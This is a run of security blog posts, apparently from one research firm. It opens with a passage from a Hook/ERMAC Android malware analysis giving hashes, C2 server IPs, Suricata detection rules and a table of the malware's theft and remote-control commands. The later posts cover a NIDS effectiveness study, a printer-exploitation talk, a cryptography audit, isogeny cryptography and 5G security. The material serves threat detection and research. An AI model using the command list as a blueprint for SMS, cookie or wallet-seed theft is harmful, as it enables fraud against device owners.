Hookcom.wawocizurovi.gadomid651219c28eec876f8961dcd0a0e365df110f09b7ae72eccb9de8c84129e23cb
ERMACcom.cazojowiruje.tutadoe0bd84272ea93ea857cc74a745727085cf214eef0b5dcaf3a220d982c89cea84
ERMACcom.jakedegivuwuwe.yewo6d8707da5cb71e23982bd29ac6a9f6069d6620f3bc7d1fd50b06e9897bc0ac50

C2 servers

FamilyIP address
Hook5.42.199[.]22
Hook45.81.39[.]149
Hook45.93.201[.]92
Hook176.100.42[.]11
Hook91.215.85[.]223
Hook91.215.85[.]37
Hook91.215.85[.]23
Hook185.186.246[.]69
ERMAC5.42.199[.]91
ERMAC31.41.244[.]187
ERMAC45.93.201[.]92
ERMAC92.243.88[.]25
ERMAC176.113.115[.]66
ERMAC165.232.78[.]246
ERMAC51.15.150[.]5
ERMAC176.100.42[.]11
ERMAC91.215.85[.]22
ERMAC35.91.53[.]224
ERMAC193.106.191[.]148
ERMAC20.249.63[.]72
ERMAC62.204.41[.]98
ERMAC193.106.191[.]121
ERMAC193.106.191[.]116
ERMAC176.113.115[.]150
ERMAC91.213.50[.]62
ERMAC193.106.191[.]118
ERMAC5.42.199[.]3
ERMAC193.56.146[.]176
ERMAC62.204.41[.]94
ERMAC176.113.115[.]67
ERMAC108.61.166[.]245
ERMAC45.159.248[.]25
ERMAC20.108.0[.]165
ERMAC20.210.252[.]118
ERMAC68.178.206[.]43
ERMAC35.90.154[.]240

Network detection

The following Suricata rules were tested successfully against Hook network traffic:

# Detection for Hook/ERMAC mobile malware
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Mobile Malware – Possible Hook/ERMAC HTTP POST"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/php/"; depth:5; content:".php/"; isdataat:!1,relative; fast_pattern; pcre:"/^\/php\/[a-z0-9]{1,21}\.php\/$/U"; classtype:trojan-activity; priority:1; threshold:type limit,track by_src,count 1,seconds 3600; metadata:ids suricata; metadata:created_at 2023-06-02; metadata:updated_at 2023-06-07; sid:21004440; rev:2;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Mobile Malware – Possible Hook Websocket Packet Observed (login)"; content:"|81|"; depth:1; byte_test:1,&,0x80,1; luajit:hook.lua; classtype:trojan-activity; priority:1; threshold:type limit,track by_src,count 1,seconds 3600; metadata:ids suricata; metadata:created_at 2023-06-02; metadata:updated_at 2023-06-07; sid:21004441; rev:2;)
view raw hook.rules hosted with ❤ by GitHub

The second Suricata rule uses an additional Lua script, which can be found here

List of Commands

FamilyCommandDescription
ERMAC, Hook 1 2sendsmsSends a specified SMS message to a specified number. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 2startussdExecutes a given USSD code on the victim’s device
ERMAC, Hook 1 2forwardcallSets up a call forwarder to forward all calls to the specified number in the payload
ERMAC, Hook 1 2pushDisplays a push notification on the victim’s device, with a custom app name, title, and text to be edited by the malware operator
ERMAC, Hook 1 2getcontactsGets list of all contacts on the victim’s device
ERMAC, Hook 1 2getaccountsGets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 2logaccountsGets a list of the accounts on the victim’s device by their name and account type
ERMAC, Hook 1 2getinstallappsGets a list of the installed apps on the victim’s device
ERMAC, Hook 1 2getsmsSteals all SMS messages from the victim’s device
ERMAC, Hook 1 2startinjectPerforms a phishing overlay attack against the given application
ERMAC, Hook 1 2openurlOpens the specified URL
ERMAC, Hook 1 2startauthenticator2Starts the Google Authenticator app
ERMAC, Hook 1 2trustLaunches the Trust Wallet app
ERMAC, Hook 1 2myceliumLaunches the Mycelium Wallet app
ERMAC, Hook 1 2piukLaunches the Blockchain Wallet app
ERMAC, Hook 1 2samouraiLaunches the Samourai Wallet app
ERMAC, Hook 1 2bitcoincomLaunches the Bitcoin Wallet app
ERMAC, Hook 1 2toshiLaunches the Coinbase Wallet app
ERMAC, Hook 1 2metamaskLaunches the Metamask Wallet app
ERMAC, Hook 1 2sendsmsallSends a specified SMS message to all contacts on the victim’s device. If the SMS message is too large, it will send the message in multiple parts
ERMAC, Hook 1 2startappStarts the app specified in the payload
ERMAC, Hook 1 2clearcashSets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 2clearcacheSets the “autoClickCache” shared preference key to value 1, and launches the “Application Details” setting for the specified app (probably to clear the cache)
ERMAC, Hook 1 2callingCalls the number specified in the “number” payload, tries to lock the device and attempts to hide and mute the application
ERMAC, Hook 1 2deleteapplicationUninstalls a specified application
ERMAC, Hook 1 2startadminSets the “start_admin” shared preference key to value 1, which is probably used as a check before attempting to gain Device Admin privileges (as seen in Hook samples)
ERMAC, Hook 1 2killmeStores the package name of the malicious app in the “killApplication” shared preference key, in order to uninstall it. This is the kill switch for the malware
ERMAC, Hook 1 2updateinjectandlistappsGets a list of the currently installed apps on the victim’s device, and downloads the injection target lists
ERMAC, Hook 1 2gmailtitlesSets the “gm_list” shared preference key to the value “start” and starts the Gmail app
ERMAC, Hook 1 2getgmailmessageSets the “gm_mes_command” shared preference key to the value “start” and starts the Gmail app
Hook 1 2start_vncStarts capturing the victim’s screen constantly (streaming)
Hook 1 2stop_vncStops capturing the victim’s screen constantly (streaming)
Hook 1 2takescreenshotTakes a screenshot of the victim’s device (note that it starts the same activity as for the “start_vnc” command, but it does so without the extra “streamScreen” set to true to only take one screenshot)
Hook 1 2swipePerforms a swipe gesture with the specified 4 coordinates
Hook 1 2swipeupPerform a swipe up gesture
Hook 1 2swipedownPerforms a swipe down gesture
Hook 1 2swipeleftPerforms a swipe left gesture
Hook 1 2swiperightPerforms a swipe right gesture
Hook 1 2scrollupPerforms a scroll up gesture
Hook 1 2scrolldownPerforms a scroll down gesture
Hook 1 2onkeyeventPerforms a certain action depending on the specified key payload (POWER DIALOG, BACK, HOME, LOCK SCREEN, or RECENTS
Hook 1 2onpointereventSets X and Y coordinates and performs an action based on the payload text provided. Three options: “down”, “continue”, and “up”. It looks like these payload texts work together, as in: it first sets the starting coordinates where it should press down, then it sets the coordinates where it should draw a line to from the previous starting coordinates, then it performs a stroke gesture using this information
Hook 1 2longpressDispatches a long press gesture at the specified coordinates
Hook 1 2tapDispatches a tap gesture at the specified coordinates
Hook 1 2clickatClicks at a specific UI element
Hook 1 2clickattextClicks on the UI element with a specific text value
Hook 1 2clickatcontaintextClicks on the UI element that contains the payload text
Hook 1 2cuttextReplaces the clipboard on the victim’s device with the payload text
Hook 1 2settextSets a specified UI element to the specified text
Hook 1 2openappOpens the specified app
Hook 1 2openwhatsappSends a message through Whatsapp to the specified number
Hook 1 2addcontactAdds a new contact to the victim’s device
Hook 1 2getcallhistoryGets a log of the calls that the victim made
Hook 1 2makecallCalls the number specified in the payload
Hook 1 2forwardsmsSets up an SMS forwarder to forward the received and sent SMS messages from the victim device to the specified number in the payload
Hook 1 2getlocationGets the geographic coordinates (latitude and longitude) of the victim
Hook 1 2getimagesGets list of all images on the victim’s device
Hook 1 2downloadimageDownloads an image from the victim’s device
Hook 1 2fmmanagerEither lists the files at a specified path (additional parameter “ls”), or downloads a file from the specified path (additional parameter “dl”)
Hook 2send_sms_manySends an SMS message to multiple phone numbers
Hook 2addwaitviewDisplays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
Hook 2removewaitviewRemoves a “RelativeLayout” view group, which displays child views together in relative positions. More specifically: this command removes the “wait / loading” view that is displayed on the victim’s device as a result of the “addwaitview” command
Hook 2addviewAdds a new view with a black background that covers the entire screen
Hook 2removeviewRemoves a “LinearLayout” view group, which arranges other views either horizontally in a single column or vertically in a single row. More specifically: this command removes the view with the black background that was added by the “addview” command
Hook 2cookieSteals session cookies (targets victim’s Google account)
Hook 2safepalStarts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2exodusStarts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
Hook 2takephotoTakes a photo of the victim using the front facing camera

References


[1] – https://www.threatfabric.com/blogs/hook-a-new-ermac-fork-with-rat-capabilities
[2] – https://cebrf.knf.gov.pl/komunikaty/artykuly-csirt-knf/362-ostrzezenia/858-hookbot-a-new-mobile-malware
[3] – https://socket.io/docs/v4/

Ruling the rules

Mathew Vermeer is a doctoral candidate at the Organisation Governance department of the faculty of Technology, Policy and Management of Delft University of Technology. At the same university, he has received both a BSc degree in Computer Science and Engineering, as well as a MSc degree in Computer Science with a specialization in cyber security. His master’s thesis examined (machine learning-based) network intrusion detection systems (NIDSs), their effectiveness in practice, and methods for their proper evaluation in real-world settings. In 2019 he joined the university as a PhD researcher. Mathew’s current research similarly includes NIDS performance and management processes within organizations, as well as external network asset discovery and security incident prediction.

Introduction

The following is a short summary of a study conducted as part of my PhD research at TU Delft in collaboration with Fox-IT. We’re interested in studying the different processes and technologies that determine or impact the security posture of organizations. In this case, we set out to better understand the signature-based network intrusion detection system (NIDS). Ubiquitous within the field of network security, it’s been part of the bedrock of network security for over two decades, and industry reports have been predicting its demise for almost just as long [1]. Both industry and academia [2, 3] seem to be pushing for a gradual phasing out of the supposedly “less-capable” [2] signature-based NIDS in favour of machine-learning (ML) methods. The former uses sets of signatures (or rules) that inform the NIDS what to look for in network traffic and flag as potentially malicious, while the latter uses statistical techniques to find potentially malicious anomalies within network traffic. The underlying motivation is that conventional rule- and signature-based methods are deemed unable to keep up with the fast-evolving threats and will, therefore, become increasingly obsolete. While some argue for complementary use, others imply outright replacement to be a more effective solution, comparing their own ML system with an improperly configured (i.e., enabling every single rule from the Emerging Threats community ruleset) signature-based NIDS to try to drive home the point [4]. On the other hand, walk into any security operations center (SOC) and what you’ll see is analysts triaging alerts generated by NIDSs that still rely heavily on rulesets.   So how much of this push is simply hype and how much is backed up by actual data? Do traditional signature-based NIDSs truly no longer add to an organization’s security? To answer this, we analyzed alert and incident data from Fox-IT, and the many proprietary and commercial rulesets employed at Fox-IT spanning from mid-2009 to mid-2018. We used this data to examine how Fox-IT manages its own signature-based NIDS to provide security for its clients. The most interesting results are described below.

NIDS environment

First, it’s helpful to get acquainted with the environment in place at Fox-IT. The figure below roughly illustrates the NIDS pipeline in use at Fox-IT, starting from the NIDS rules on the left to the incidents all the way on the right. Rules are either purchased from a threat intel vendor or created in-house. Of note is that in-house rules are usually tested for a period of time, where they are tweaked until its performance is deemed acceptable, which can vary depending on the novelty, severity, etc., of the threat it is trying to detect. Once that condition is reached, the rules added to the production environment, where rules can again be modified based on its performance in a real-world environment.

Modelling the workflows in this way allows us to find relationships between alerts, incidents, and rules, as well as the effects that security events have on the manner in which rules are managed.

Custom ruleset important for proper functioning of NIDS

One of the go-to metrics for measuring the effectiveness of security systems is their precision [5]. This is because, as opposed to simple accuracy, precision penalizes false positives. Since false positive detections is something rule developers and SOC analysts often strive to minimize, it stands to reason that such occurrences are taken into account when measuring the performance of an NIDS. We found that the custom rulesets Fox-IT creates in-house is critical for the proper functioning of its NIDS. The precision of Fox-IT’s proprietary ruleset is higher than the commercial sets employed: an average of 0.74, in contrast to 0.68 and 0.65 for the commercial rulesets, respectively. Important to note here is that the commercial sets achieve such precision scores only because of extensive tuning by the Fox-IT team prior to introducing the rules into the sensors. Had this not occurred, their measured precision would be much lower (in case the sensors had not burst into flames beforehand). The Fox-IT ruleset is much smaller than the commercial rule sets: around 2,000 rules versus over the tens of thousands commercial rules from ET and Talos. Nevertheless, the rules within Fox-IT’s own ruleset are present in 27% of all true positive incidents. This is surprising, given the massive difference in ruleset size (2,000 Fox-IT rules vs. 50,000+ commercial rules) and, therefore, threat coverage. Both findings here clearly demonstrate the higher utility of Fox-IT’s proprietary rules. Still, they clearly play a complementary role to the commercial rules, which is something we explore in a different study.

Newest rules produce most incidents

The figure below shows the average age of rules plotted against the number of incidents that such a particular rule of that age will trigger on average per week. For instance, the spike on the left represents rules that are a week old. Such a week-old rule would, then, on average, produce around four incidents per week. This means that it’s the newest rules that produce the most incidents. The implications of this are twofold. Firstly, it emphasizes the importance of staying up to date with the global threat landscape. It is insufficient to rely on rules and rulesets that perfectly protected your organization once upon a time. SOC teams need to continuously scour for new threats and perform their own research to maintain their organization and their clients secure. And secondly, rules seem to lose their relevance and effectiveness as time goes by. Probably obvious, yes, but it hints at the possibilities of another type of NIDS optimization: performance issues. While disabling any and all rules that pass a certain age threshold might not be the wisest of decisions, SOC teams can examine old rules to determine which ones produce results that are less than satisfactory. Such rules can then potentially be disabled, depending, of course, on the type of rule, severity of the threat it is designed to detect, its precision (or any other metric), etc.

99.8% of (detected) true positive incidents caught before becoming successful attacks

Finally, the image below is a visual representation of all the alerts we analyzed, and how they are condensed into incidents, true positive incidents, and successful attacks. For the 13 years of data made available for this analysis, we counted 62 million alerts that our SOC analysts processed. They were able to condense the 62 million alerts into 150,000 incidents. Out of these 150,000 incidents, they were again condensed to 69,000 true positive incidents. And finally, out of the 69,000, only 106 of these incidents turned out to be successful attacks. With some quick math we can deduce that 99.8% of all true positive incidents detected by the SOC were discovered before they were able to cause any serious damage to the organizations that they aim to protect on a daily basis. I’ll point out, though, that this number obviously ignores the potential false negatives that were able to evade detection. This is, naturally, a number that we can’t easily measure accurately. However, we’re certain it doesn’t run high enough to significantly alter the result, and so, we’re confident in the accuracy of the computed percentage.

Conclusion

So, with all of these results, we demonstrate that signature-based systems are still effective, given that they are managed properly, for example, by keeping them up to date with the newest threat intelligence. Of course, future work is still needed to compare the signature-based approach to other different types of intrusion detection approaches, whether they’re other network-based, host-based or application-based approaches. Only once that comparison is done will we be able to determine whether these signature-based systems really do need to be phased out as archaic and obsolete pieces of technology or if they remain an indispensable part of our network security. As it currently stands, however, the fact that they continue to provide value and security to the organizations that use them is indisputable.   This was a quick overview of a few findings from our study. If you’re curious for more, you’re welcome to take a look at the full paper (https://dl.acm.org/doi/abs/10.1145/3488932.3517412).

References

[1] http://web.archive.org/web/20201209162847/https://bricata.com/blog/ids-is-dead/

[2] Shone, N., Ngoc, T.N., Phai, V.D. and Shi, Q., 2018. A deep learning approach to network intrusion detection. IEEE transactions on emerging topics in computational intelligence, 2(1), pp.41-50.

[3] Vigna, G., 2010, December. Network intrusion detection: dead or alive?. In Proceedings of the 26th Annual Computer Security Applications Conference (pp. 117-126).

[4] Mirsky, Y., Doitshman, T., Elovici, Y. and Shabtai, A., 2018. Kitsune: an ensemble of autoencoders for online network intrusion detection. arXiv preprint arXiv:1802.09089.

[5] He, H. and Garcia, E.A., 2009. Learning from imbalanced data. IEEE Transactions on knowledge and data engineering, 21(9), pp.1263-1284.

HITB Phuket 2023 – Exploiting the Lexmark PostScript Stack

Aaron Adams presented this talk at HITB Phuket on the 24th August 2023. The talk
detailed how NCC Exploit Development Group (EDG) in Pwn2Own 2022 Toronto was
able to exploit two different PostScript vulnerabilities in Lexmark printers.
The presentation is a good primer for those interested in further researching
the Lexmark PostScript stack, and also those interested in how PostScript
interpreter exploitation can be approached in general.

The slides for the talk can be downloaded here.

Public Report – Entropy/Rust Cryptography Review

During the summer of 2023, Entropy Cryptography Inc engaged NCC Group’s Cryptography Services team to perform a cryptography and implementation review of several Rust-based libraries implementing constant-time big integer arithmetic, prime generation, and secp256k1 (k256) elliptic curve functionality. Two consultants performed the review within 40 person-days of effort, which included retesting and report generation.

The three primary code repositories in scope for this review were:

  1. github.com/RustCrypto/crypto-bigint
  2. github.com/entropyxyz/crypto-primes
  3. github.com/RustCrypto/elliptic-curves/k256.

The review identified a range of issues that were addressed promptly once reported, with the proposed fixes aligning with the recommendations made in the report below.

SIAM AG23: Algebraic Geometry with Friends

I recently returned from Eindhoven, where I had the pleasure of giving a talk on some recent progress in isogeny-based cryptography at the SIAM Conference on Applied Algebraic Geometry (SIAM AG23). Firstly, I want to thank Tanja Lange, Krijn Reijnders and Monika Trimoska, who orgainsed the mini-symposium on the application of isogenies in cryptography, as well as the other speakers and attendees who made the week such a vibrant space for learning and collaborating.

As an overview, the SIAM Conference on Applied Algebraic Geometry is a biennial event which aims to collect together researchers from academia and industry to discuss new progress in their respective fields, which all fall under the beautiful world of algebraic geometry. Considering the breadth of algebraic geometry, it is maybe not so surprising that the conference is then filled with an eclectic mix of work, with mini-symposia dedicated to biology, coding theory, cryptography, data science, digital imaging, machine learning and robotics (and much more!).

In the world of cryptography, algebraic geometry appears most prominently in public-key cryptography, both constructively and in cryptanalysis. Currently in cryptography, the most widely applied and studied objects from algebraic geometry are elliptic curves. The simple, but generic group structure of an elliptic curve together with efficient arithmetic from particular curve models has made it the gold standard for Diffie-Hellman key exchanges and the protocols built on top of this. More recently, progress in the implementation of bilinear pairings on elliptic curves has given a new research direction for building protocols. For an overview of pairing-based cryptography, I have a blog post discussing how we estimate the security of these schemes, and my colleague Eric Schorn has a series of posts looking at the implementation of pairing-based cryptography in Haskell and Rust.

Despite the success of elliptic curve cryptography, Shor’s quantum polynomial time algorithm to solve the discrete logarithm problem in abelian groups means a working, “large-enough”, quantum computer threatens to break most of the protocols which underpin modern cryptography. This devastating attack has led to the search for efficient, quantum-safe cryptography to replace the algorithms currently in use. Mathematicians and cryptographers have been searching for new cryptographically hard problems and building protocols from these, and algebraic geometry has again been a gold mine for new ideas. Our group effort since Shor’s paper in 1995 has lead to exciting progress in areas such as multivariate, code-based, and my personal favourite, isogeny-based cryptography.

The study of post-quantum cryptography was the focus of many of the cryptographic talks over the course of the week, although the context and presentation of these problems was still very diverse. Zooming out, SIAM collectively organised 128+ sessions and 10 plenary talks; a full list of the program is available online. With a diverse group of people and a wide range of topics, the idea was not to attend everything (this is physically impossible for those who cannot split themselves into ~fourteen sentient pieces), but rather pick our own adventure from the program.

For the cryptographers who visited Eindhoven, there were three main symposia, which ran through the week without collisions:

  • Applications of Algebraic Geometry to Post-Quantum Cryptology.
  • Elliptic Curves and Pairings in Cryptography.
  • Applications of Isogenies in Cryptography.

Additional cryptography talks were in the single session “Advances in Code-Based Signatures”, which ran concurrently with the pairing talks on the Wednesday.

For those interested in a short summary of many of the talks at SIAM, Luca De Feo wrote a blog post about his experience of the conference which is available on Elliptic News. As a compliment to what has then already been written, the aim of this blogpost is to give a general impression of what people are thinking about and the research which is currently ongoing.

In particular, the goal of this post is to summarize and give context to two of the main research focuses in isogeny-based cryptography which were talked about during the week. On one side, there is a deluge in new protocols being put forward which study isogenies between abelian varieties, generalising away from dimension one isogenies between elliptic curves. On the other side, the isogeny-based digital signature algorithm, SQIsign, has recently been submitted to the recent call for new quantum safe signatures by NIST. Many talks through the week focused on algorithmic and parameter improvements to aid in the submission process.

What is an isogeny?

For those less familiar with isogenies, a very rough way to start thinking about isogeny-based cryptography can be understood as long as you have a good idea of how it feels to get lost, even when you know where you’re supposed to be going. Essentially, you can take a twisting and turning walk by using an “isogeny” to step from one elliptic curve to another. If I tell you where I started and where I end up, it seems very difficult for someone else to determine exactly the path I took to get there. In this way, our cryptographic secret is our path and our public information is the final curve at the end of this long walk.

Not only does this problem seem difficult, it also seems equally difficult for both classical and quantum computers, which makes it an ideal candidate for the building block of new protocols which aim to be quantum-safe. For some more context on the search for protocols in a “post-quantum” world, Thomas Pornin wrote an overview at the closing of round three of the NIST post-quantum project which ended about a year ago at the time of writing.

A little more specifically, for those interested, an isogeny is a special map which respects both the geometric idea of elliptic curves (it maps some projective curve to another), but also the algebraic group structure which cryptographers hold so dear (mapping the sum of points is the same as the sum of the individually mapped points). Concretely, an isogeny is some (non-constant) rational map which maps the identity on one curve to the identity of another.

Isogenies in Higher Dimensions

For the past year, isogeny-based cryptography has undergone a revolution after a series of papers appeared which broke the key exchange protocol SIDH. The practical breakage of SIDH was particularly spectacular as it essentially removed the key-exchange mechanism, SIKE, from the NIST post-quantum project; which only weeks before had been chosen by NIST to continue to the fourth round as a prospective alternative candidate to Kyber.

For more information on the break of SIDH, I have a post on the SageMath implementation of the first attack, as well as a summary of the Eurocrypt 2023 conference, where the three attack papers were presented in the best-paper award plenary talks. Thomas Decru, one of the authors of the first attack paper, wrote a fantastic blog post which is a great overview of how the attack works.

The key to all of the attacks was that given some special data, information about the secret walk between elliptic curves could be recovered by computing an isogeny in “higher dimension”. In fact, the short description about isogenies was a little to restrictive. For the past ten years, cryptographers have been looking at how to compute isogenies between supersingular elliptic curves. However, over the fence in maths world, a generalisation of this idea is to look at isogenies between principally polarised superspecial abelian varieties. When we talk about these superspecial abelian varieties, a natural way to categorise them is by their “genus”, or “dimension”.

Luckily, for now, we don’t need to worry about arbitrary dimension, as for the current work we really only need dimension two for the attack on SIDH, and for some new proposed schemes, dimensions four and eight, which I won’t discuss much further.

If you want to imagine these higher dimensional varieties, one way is to think about three dimensional surfaces which have some “holes” or “handles”. A dimension one variety is an elliptic curve, which you can imagine as a donut. In dimension two we have two options, the generic object is some surface with two handles (a donut with two holes? Where’s all my donut gone?), but there are also “products of elliptic curves”, which can be seen as two dimensional surfaces which can in some sense be factored into two dimension-one surfaces (or abstractly, as a pair of donuts!).

The core computation of the attack is a two-dimensional iosgeny between elliptic products. An isogeny between elliptic products is simply a walk which takes you from one of these pairs of donuts, through many many steps of the generic surface and ends on another special surface which factors into donuts again. A natural question to ask is, how special are these products? When we work in a finite field with characteristic p, we have about p^3 surfaces available and only p^2 of these are elliptic products. In cryptographic contexts, where the characteristic is usually very very large, it’s essentially impossible to accidentally land on one of these products.

With this as background, we can now ask a few natural questions:

  • When can we compute isogenies between elliptic products?
  • Why do we want to compute isogenies between elliptic products?
  • How can we ask computers to compute isogenies between elliptic products?

Understanding when we find these very special isogenies between elliptic products was categorised by Ernst Kani in 1997, and it was this lemma which illuminated the method to attack SIDH. Kani’s criterion described how when a set of one dimensional isogenies has particular properties, and when you additionally know certain information about the points on these curves, you would find that your specially chosen two dimensional isogeny would walk between elliptic products.

This is what Thomas Decru talked about in his presentation, which gave a wonderful overview of why these criteria were enough to successfully break SIDH. The idea is that although some of this information is secret, you can guess small parts of the secret and when you are correct, your two dimensional isogeny splits at the end. Guessing each part of the secret in turn then very quickly recovers the entire secret.

Following the description of the death of SIKE, Tako Boris Fouotsa talked about possible ways to modify the SIDH protocol to revive it. The general idea is to hide parts of the information Kani’s criterion required to in such a way that an attacker can no longer guess it piece by piece. One method is to take the information you need from the points on curves and mask it by multiplying them by some secret scalar.

Masking these points, which are the torsion data for the curves, was also the topic of two other talks. Guido Lido gave an energetic and enjoyable double-talk on the “level structure” of elliptic curves, which was complimented very nicely by a talk by Luca De Feo the following day which gave another perspective on how modular curves can help us complete the zoology of these torsion structures. Along with this categorisation, Luca gave a preview of a novel attack on one possible variant of SIDH which hides half of the torsion data. If the SIDH is to be dragged back into protocols with the strategies discussed by Boris, it’s vital to really understand mathematically what this masking is, highlighting the importance of the work by Guido, Luca and their collaborators.

Although breaking a well-known and long standing cryptographic protocol is more than enough motivation to study these isogenies, the continued research on computing higher dimensional isogenies will be motivated by the introduction of these maps into protocols themselves. This brings us to the why, and this was addressed by Benjamin Wesolowski, who discussed SQIsignHD and Luciano Maino, who discussed FESTA. As SQIsign and related talks will soon have a section of its own, we’ll jump straight to FESTA.

The essence of FESTA is to find a way to configure some one dimensional isogenies during keygen and encryption such that during decryption, a holder of the secret key can perform the SIDH attack, while no one else can. As the SIDH attack describes secrets about the one dimensional isogenies, encryption is then a case of using some message to describe the isogeny path and as decryption recovers this path it also recovers the secret message. The core of how FESTA works is tied up in categories of masking, as Guido and Luca described. Luciano used his presentation to give an overview of how everything comes together, and how by using commutative masking matrices, encryption masks away certain critical data, and then during decryption the masking can be removed due thanks to the commutativity.

The idea of using SIDH attacks to build a quantum-safe public key encryption protocol is not new. In SETA, a very similar protocol was described. However, due to the inefficiencies of the SIDH attacks at the time, the protocol itself did not have practical running times. The key to what makes FESTA efficient is precisely the new polynomial time algorithms for the attack.

To close out the third session of the isogeny session, I then did my best to try and talk about the how. Given the motivation that these isogenies can be used constructively to build quantum-safe protocols, can we find ways to strip back the complications in existing implementations and get something efficient and simple enough so it appears suitable for cryptographic protocols. The talk was split between the three categories of isogenies we need:

  • The first step is understanding how to compute the “gluing isogeny”, between a product of elliptic curves and the resulting dimension-two surface.
  • The last step is understanding how to efficiently compute the “splitting isogeny” from a two-dimensional surface to a pair of elliptic curves.
  • All other steps are then isogenies between these generic two dimensional surfaces. These are described by the Richelot correspondence, which date back to the 19th century and are surprisingly simple considering the work they do.

I described some new results which allow for particularly efficient gluing isogenies, and that working algebraically, a closed form of the splitting isogeny can be recovered, saving about 90% of the work of the usual methods. For the middle steps, there’s still much work to be done and I hope as a community we can continue optimising these isogenies.

In summary, the SIDH attacks have introduced a whole new toolbox of isogenies and it’s exciting to see these being used constructively and optimised for real-world usage. The cryptanalysis on isogenies based protocols of course has it’s own revolution and understanding how higher dimensional structures can make or break new schemes is vibrant and exciting work.

An Isogeny Walk back to NIST

Back in dimension one, an isogeny-based digital signature algorithm has been submitted to NIST’s recent call for protocols. Of the 40 candidates which appeared with round one coming online, only one is isogeny-based. SQIsign is an extremely compact, but relatively new and slow protocol which was introduced in 2020 and was followed up with a paper with various performance enhancements in 2022.

Underlying SQIsign is a fairly simple idea. The signer has computes a secret isogeny path between two elliptic curves. The starting curve, which is public and known to everyone, has special properties. The signer publishes their ending curve as a public key, but as only they know the isogeny between the curve, only the signer knows special properties of the ending curve. A signature is computed from a high-soundness sigma protocol, which essentially boils down to asking the signer to compute something which they could only know if they know this secret isogeny.

Concretely, SQIsign is built on the knowledge of the endomorphism ring of an elliptic curve, which is the set of isogenies from a curve to itself. The starting curve is chosen so everyone knows its endomorphism ring. The trick in SQIsign is that although generally it seems hard to compute the endomorphism ring of a random supersingular curve, if you know an isogeny between two curves and the endomorphism ring of one of them, you can efficiently compute the endomorphism ring of the other. This means that the secret isogeny allows the signer to “transport” the endomorphism ring from the starting curve to their public curve thanks to their secret isogeny and so the endomorphism ring of this end curve is secret to everyone except the signer.

Algorithms become efficient thanks to the Deuring correspondence, which takes information from an elliptic curve and represents it using a quaternion algebra. In quaternion world, certain problems become easy which are hard on elliptic curves, and once the right information is recovered, the Deuring correspondence maps this all back to elliptic curve world so the protocol can continue. Ultimately all of the above boils down to “things are computationally easy if you know the endomorphism ring”. Because of this, as signer can compute things from the public curve which nobody else can feasibly do.

There’s a lot of buzzwords in the above, and unpicking exactly how SQIsign works is challenging. For the interested reader, I recommend the above papers, along with Antonin Leroux’s thesis. For those who like to learn along with the implementation, I worked with some collaborators to write a verbose implementation following the first SQIsign paper in SageMath. A blog discussing implementation challenges was written: Learning to SQI and the code is on GitHub.

The selling point of SQIsign is its compact representation. For NIST level I security (128-bit), a public key requires only 64 bytes and a signature only 177 bytes. Compare this to Dilithium, a lattice based scheme chosen at the end of round three, which at the same security level has public keys with 1312 bytes and signatures of 2420 bytes! However, the main drawback is that it’s magnitudes slower than Dilithium, and the complex, heuristic algorithms of some of the quaternion algebra pieces means that writing a safe and side-channel resistant implementation is extremely challenging.

At SIAM, progress in closing the efficiency gap was the subject of several talks, and optimisations are being found in a variety of ways. Lorenz Panny discussed the Deuring correspondence in a more general setting, where he showed that with some clever algorithmic tricks, isogenies could be computed in reasonable time by using extension fields to gather enough data for the Deuring correspondence to be feasible, even for inefficient parameter sets.

On the flip side of this, Michael Meyer discussed recent advances in parameter searching for SQIsign, which makes the work that Lorenz described particularly efficient. One of the main bottlenecks in SQIsign is in computing large prime degree isogenies, which occurs because SQIsign requires the characteristic p to both have p+1 and p-1 to have many small factors and for large p, it’s tough to ensure all these factors stay as small as possible. Michael discussed several different tricks which can be used to find twin smooth numbers and how different techniques are beneficial depending on the size of bit-length of p. The upshot is the culmination of all the ideas has allowed the SQIsign team to find valid parameter sets targeting all three NIST security levels.

Antonin Leroux talked more specifically about the Deuring correspondence as used in the context of SQIsign and focused on the improvements between the 2020 and 2022 SQIsign papers. The takeaway was that several improvements have resulted in performance enhancements to allow up to NIST-V parameter sets, but the protocol was a long way off competing with the lattice protocols which had already been picked. Optimistically, we can always work hard to find faster ways to do mathematics, and the compact keys and signatures of SQIsign make it extremely attractive for certain use cases.

To finish the summary, we can come back to Benjamin Wesolowski’s talk, which described recent research which adopts the progress in higher dimensions and modifies the SQIsign protocol, removing many heuristic and complicated steps during keygen and signing and shifts the protocol’s complexity into verification.

The main selling point of SQIsignHD is that it is not only simpler to implement in many ways, but the security proofs become much more straight forward, which should go a long way to show that the protocol is robust. However, unlike the original SQIsign, SQIsignHD verification requires the computation of a four dimensional isogeny. These isogenies are theoretically described, but a full implementation of these is still a work in progress. Understanding precisely how the verification time is affected is key to understanding whether the HD-remake of SQIsign could either replace of exist along side of the original description.

Acknowledgements

Many thanks to Aleksander Kircanski for reading an earlier draft of this blog post, and to all the people I worked with during the week in Eindhoven.

5G security – how to minimise the threats to a 5G network

To ensure security of new 5G telecom networks, NCC Group has been providing guidance, conducting code reviews, red team engagements and pentesting 5G standalone and non-standalone networks since 2019. As with any network various attackers are motivated by different reasons. An attacker could be motivated to either gain information about subscribers on an operator’s network by targeting signalling, accessing the customers private data such as billing records, taking control over the management network or taking down the network. In most cases, the main avenue of attack is via the management layer into the core network – either utilising the operator’s support personnel or via the 3rd party vendor. In all cases attacking a 5G network will take a number of weeks or months, with the main group of attackers being Advanced Persistent Threat (APT) groups. Many governments around the world including the UK government are legislating and demanding operators and vendors reduce telecoms security gaps to ensure a resilient 5G network.

But many operators are unclear on the typical threats and how they could affect their business or if they do at all. Many companies are understandably investing significant time and effort into testing and reviewing threats to make sure they adhere to the compliance requirements.

Here, we aim to cover some of the main issues we have discovered during our pentesting and consultancy engagements with clients and explain not only what they are but how likely the threat is to disrupt the 5G network.

Background

